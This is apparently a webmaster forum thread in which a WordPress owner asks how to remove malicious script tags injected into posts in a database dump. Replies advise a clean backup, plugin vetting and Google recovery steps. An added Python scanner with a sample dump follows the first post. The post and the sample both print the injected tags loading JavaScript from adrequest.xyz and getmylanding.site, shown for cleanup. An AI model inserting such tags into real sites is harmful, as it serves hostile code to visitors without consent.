How to remove malware from database.sql

avery123

9:04 pm on Mar 23, 2019 (gmt 0)

10+ Year Member



Hi folks,
I have found a malware script in my database.sql file.
As I am not a backend developer I need help with this.

Part of it is as follows, and I have now removed it from this file:

<script async src=\'https://adrequest.xyz/ad.js?t=3\' type=\'text/javascript\'></script><script async src=\'https://getmylanding.site/demo.js?t=2\' type=\'text/javascript\'></script>


There were over 700 entries of the above code, all in one line. The line started with:
INSERT INTO `wp_posts` VALUES (5,1,'2015-08-29 18:28:52','2015-08-29 18:28:52','


However, I have also found another line, starting with
INSERT INTO `wp_wfconfig` VALUES
that includes a very long string of letters and numbers.

Is this supposed to be there, or is it also part of the malware?

Thanks for reading
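A way to inventory this kind of injection in a dump before editing it, or to check that a backup predates it (an added example, not part of the original post). It counts `<script src=...>` tags that load from external hosts, grouped by table and host; the function names, the `allowed_hosts` parameter and the sample dump lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# <script ... src=...> where the quote may be backslash-escaped, as in a mysqldump file.
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*\\?['"]([^'"\\>\s]+)""", re.IGNORECASE)
INSERT_INTO = re.compile(r"^INSERT INTO `([^`]+)`", re.IGNORECASE)

def scan_dump(lines, allowed_hosts=()):
    """Count external script tags per (table, host) in the lines of a SQL dump."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = Counter()
    for line in lines:
        m = INSERT_INTO.match(line)
        if not m:
            continue
        table = m.group(1)
        for src in SCRIPT_SRC.findall(line):
            # Relative URLs have no hostname and are skipped: they load from the site itself.
            host = (urlparse(src).hostname or "").lower()
            if host and host not in allowed:
                hits[(table, host)] += 1
    return hits

def scan_file(path, allowed_hosts=()):
    """Same scan over a dump on disk; undecodable bytes are replaced, not fatal."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_dump(fh, allowed_hosts)

# Constructed sample modelled on the lines quoted in the post (two rows, not 700 entries).
# wp_wfconfig is the settings table the Wordfence plugin creates; its value here is made up.
SAMPLE_DUMP = r"""
INSERT INTO `wp_posts` VALUES (5,1,'2015-08-29 18:28:52','2015-08-29 18:28:52','<p>Hello</p><script async src=\'https://adrequest.xyz/ad.js?t=3\' type=\'text/javascript\'></script><script async src=\'https://getmylanding.site/demo.js?t=2\' type=\'text/javascript\'></script>'),(6,1,'2015-08-30 10:00:00','2015-08-30 10:00:00','<p>Two</p><script async src=\'https://adrequest.xyz/ad.js?t=3\' type=\'text/javascript\'></script><script src=\'/wp-includes/js/local.js\'></script>');
INSERT INTO `wp_wfconfig` VALUES ('constructedKey','0a1b2c3d4e5f60718293a4b5c6d7e8f9');
""".strip().splitlines()

if __name__ == "__main__":
    for (table, host), count in sorted(scan_dump(SAMPLE_DUMP).items()):
        print(f"{table}: {count} script tag(s) loading from {host}")
```

Hosts the site loads scripts from on purpose can be passed in `allowed_hosts` so only unexpected ones are reported. The scan looks only for script tags, so a long string of letters and numbers in another table is not flagged either way.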

topr8

12:37 am on Mar 24, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I imagine you are on WordPress? ... if so the first thing to do is update to the latest version, after that check every single plugin you are using to see if there are known exploits ... if there are and they haven't been patched with an updated plugin, then uninstall the plugin.

tangor

3:17 am on Mar 24, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Locate date of the infection then nuke by restoring from the last valid backup. THEN update to latest and VET the plugins desired (or remove).

You do have a backup, right?

not2easy

4:44 am on Mar 24, 2019 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



Google offers some help and tools for removal and repair: [support.google.com...]

Since they may flag your site for malware and not show it until it is fixed, you may need to have it re-approved: [support.google.com...]

avery123

9:53 pm on Mar 24, 2019 (gmt 0)

10+ Year Member



Hi topr8,
Thanks for replying... Yes I am on WP ... I saw the spammy link code in a report run by my security plugin Wordfence. See screenshot:
[screencast.com...]

Unlike with other issues, Wordfence couldn't fix or delete the problem, so I was left trying to figure out how to get rid of it.

I am also reluctant to delete some plugins because some are custom and were created by a Developer I hired... so, I have to be careful.

lucy24

10:34 pm on Mar 24, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I have to be careful.
Good thinking. If you’re not careful, you might find your files infected with malware.

avery123

9:14 pm on Mar 26, 2019 (gmt 0)

10+ Year Member



Hi tangor,
Thanks for replying. Yes I do have a backup.

I managed to find one of them that was downloaded just before the malware infection.

I have now uploaded it and stripped out all the old dormant or unnecessary plugins.
I have installed and run Wordfence... and cleaned up a lot of files.

This seems to have worked.

avery123

9:46 pm on Mar 26, 2019 (gmt 0)

10+ Year Member



Thanks not2easy,
I rebuilt one of my sites, a Nutrition site, in pure HTML and CSS. It takes up a comparatively tiny amount of file space compared with the WP files.

However, G Webmaster has shown my traffic drop off to zero. I suspect due to the pages now ending with ".html".

I will look at your web pages you've linked to and start the process of informing Google of my recent infection. I think I'll install a fresh WP and re-build it. Unfortunately I don't have a backup for the Nutrition site, but I do have the edited style.css file, so it should take long to get it resembling the WP original.

tangor

10:20 pm on Mar 26, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



@avery123 ... that is good news! Don't forget to take an immediate snapshot of the new/revised install as soon as possible, and mark it for hold 'til the sun shines, Nellie!

not2easy

10:21 pm on Mar 26, 2019 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



If your traffic has "dropped off to zero" it could be that Google has detected a security/malware problem already. If so, I believe they would let you know in GSC.

As long as you have a sitemap that shows the current URLs it should not make much difference what those URLs end with. Best practice would be to redirect the old URLs to the new versions. If your site is being frequently changed it can be difficult to get organic traffic.

avery123

10:52 pm on Mar 30, 2019 (gmt 0)

10+ Year Member



@tangor,
Thanks, I will create a backup. Just out of interest, what plugin do you recommend for this?

@not2easy,
The only warning I received from the G Webmaster area was a warning that some links or buttons were too close together for using on smartphones.
This was just after I re-uploaded the site onto a new server.

tangor

12:26 am on Mar 31, 2019 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Thanks, I will create a backup. Just out of interest, what plugin do you recommend for this?


The easiest one: FTP to your local machine! Put it on removable data and put it in a lock box somewhere off site.

Others will have different suggestions. I just like to keep it simple. (KISS method)